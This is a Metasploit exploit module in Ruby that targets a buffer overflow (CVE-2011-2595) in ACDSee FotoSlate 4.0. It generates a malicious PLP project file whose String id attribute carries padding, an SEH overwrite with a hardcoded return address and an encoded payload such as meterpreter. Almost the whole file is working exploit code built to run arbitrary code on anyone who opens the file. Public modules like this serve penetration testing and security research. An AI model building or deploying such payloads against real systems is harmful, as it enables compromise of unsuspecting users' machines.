1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::FILEFORMAT
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'ACDSee FotoSlate PLP File id Parameter Overflow',
17
        'Description' => %q{
18
          This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
19
          a specially crafted id parameter in a String element.  When viewing a malicious
20
          PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
21
          buffer and execute arbitrary code. This exploit has been tested on systems such as
22
          Windows XP SP3, Windows Vista, and Windows 7.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'Parvez Anwar', # Vulnerability discovery
27
          'juan vazquez' # Metasploit module
28
        ],
29
        'References' => [
30
          [ 'CVE', '2011-2595' ],
31
          [ 'OSVDB', '75425' ],
32
          [ 'BID', '49558' ],
33
        ],
34
        'DefaultOptions' => {
35
          'EXITFUNC' => 'process',
36
          'DisablePayloadHandler' => true
37
        },
38
        'Payload' => {
39
          # 'Space'    => 4000,
40
          'BadChars' => "\x00\x22"
41
        },
42
        'Platform' => 'win',
43
        'Targets' => [
44
          [
45
            'ACDSee FotoSlate 4.0 Build 146',
46
            {
47
              'Ret' => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
48
              'Offset' => 1812,
49
              'TotalLength' => 5000
50
            }
51
          ],
52
        ],
53
        'Privileged' => false,
54
        'DisclosureDate' => '2011-09-12',
55
        'DefaultTarget' => 0,
56
        'Notes' => {
57
          'Reliability' => UNKNOWN_RELIABILITY,
58
          'Stability' => UNKNOWN_STABILITY,
59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
60
        }
61
      )
62
    )
63

64
    register_options(
65
      [
66
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
67
      ]
68
    )
69
  end
70

71
  def exploit
72
    overflow = rand_text(target["Offset"])
73
    overflow << generate_seh_record(target.ret)
74
    overflow << payload.encoded
75
    overflow << rand_text_alpha(target["TotalLength"] - overflow.length)
76

77
    plp = <<~TEMPLATE
78
      <?xml version="1.0" encoding="ISO-8859-1"?>
79
      <ACDFotoSlateDocument15>
80
      <PageDefinition>
81
      <Template>
82
      <Version>3.0</Version>
83
      <Page>
84
      <Name>Letter</Name>
85
      <Properties>
86
      <String id="#{overflow}"></String>
87
      <String id="Width">8.500000IN</String>
88
      <String id="Height">11.000000IN</String>
89
      <String id="Orientation">Portrait</String>
90
      <Bool id="AutoRotate">FALSE</Bool>
91
      <Bool id="AutoFill">FALSE</Bool>
92
      </Properties>
93
      <Content>
94
      <Bool id="UseBGColor">FALSE</Bool>
95
      <Int id="BGImageType">0</Int>
96
      <String id="BGImageFile"></String>
97
      <Int id="BGColor">16777215</Int>
98
      </Content>
99
      </Page>
100
      <ToolList>
101
      <Group>
102
      <Tool>
103
      <Name>Image</Name>
104
      <Properties>
105
      <String id="XPos">0.500000IN</String>
106
      <String id="YPos">0.500000IN</String>
107
      <String id="Width">7.500000IN</String>
108
      <String id="Height">10.000000IN</String>
109
      <Float id="Tilt">0.000000</Float>
110
      </Properties>
111
      <Content>
112
      <Int id="ShapeType">0</Int>
113
      <Float id="RoundRectX">0.000000</Float>
114
      <Float id="RoundRectY">0.000000</Float>
115
      <Bool id="ShrinkToFit">FALSE</Bool>
116
      <Bool id="AutoRotate">FALSE</Bool>
117
      <Float id="BorderWidth">0.000000</Float>
118
      <Bool id="UseBGColor">FALSE</Bool>
119
      <Int id="BGColor">8454143</Int>
120
      <Bool id="DropShadow">FALSE</Bool>
121
      <Int id="DSColor">0</Int>
122
      <Bool id="BevelEdge">FALSE</Bool>
123
      <Bool id="Border">FALSE</Bool>
124
      <Int id="BorderColor">16711680</Int>
125
      <Bool id="IsLocked">FALSE</Bool>
126
      </Content>
127
      </Tool>
128
      </Group>
129
      </ToolList>
130
      </Template>
131
      <PageContent>
132
      <Version>3.0</Version>
133
      <Page>
134
      <Name>Letter</Name>
135
      <Content>
136
      <Bool id="UseBGColor">FALSE</Bool>
137
      <Int id="BGImageType">0</Int>
138
      <String id="BGImageFile"></String>
139
      <Int id="BGColor">16777215</Int>
140
      </Content>
141
      </Page>
142
      <ToolList>
143
      <Group>
144
      <Tool>
145
      <Name>Image</Name>
146
      <Content>
147
      <Int id="ShapeType">0</Int>
148
      <Float id="RoundRectX">0.000000</Float>
149
      <Float id="RoundRectY">0.000000</Float>
150
      <Bool id="ShrinkToFit">FALSE</Bool>
151
      <Bool id="AutoRotate">FALSE</Bool>
152
      <Float id="BorderWidth">0.000000</Float>
153
      <Bool id="UseBGColor">FALSE</Bool>
154
      <Int id="BGColor">8454143</Int>
155
      <Bool id="DropShadow">FALSE</Bool>
156
      <Int id="DSColor">0</Int>
157
      <Bool id="BevelEdge">FALSE</Bool>
158
      <Bool id="Border">FALSE</Bool>
159
      <Int id="BorderColor">16711680</Int>
160
      <Bool id="IsLocked">FALSE</Bool>
161
      </Content>
162
      </Tool>
163
      </Group>
164
      </ToolList>
165
      </PageContent>
166
      </PageDefinition>
167
      </ACDFotoSlateDocument15>
168
    TEMPLATE
169

170
    print_status("Creating '#{datastore['FILENAME']}' file ...")
171
    file_create(plp)
172
  end
173
end
174

175
=begin
176
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid
177
using a long buffer in order to avoid the meterpreter possibly being broken.
178
=end
179

180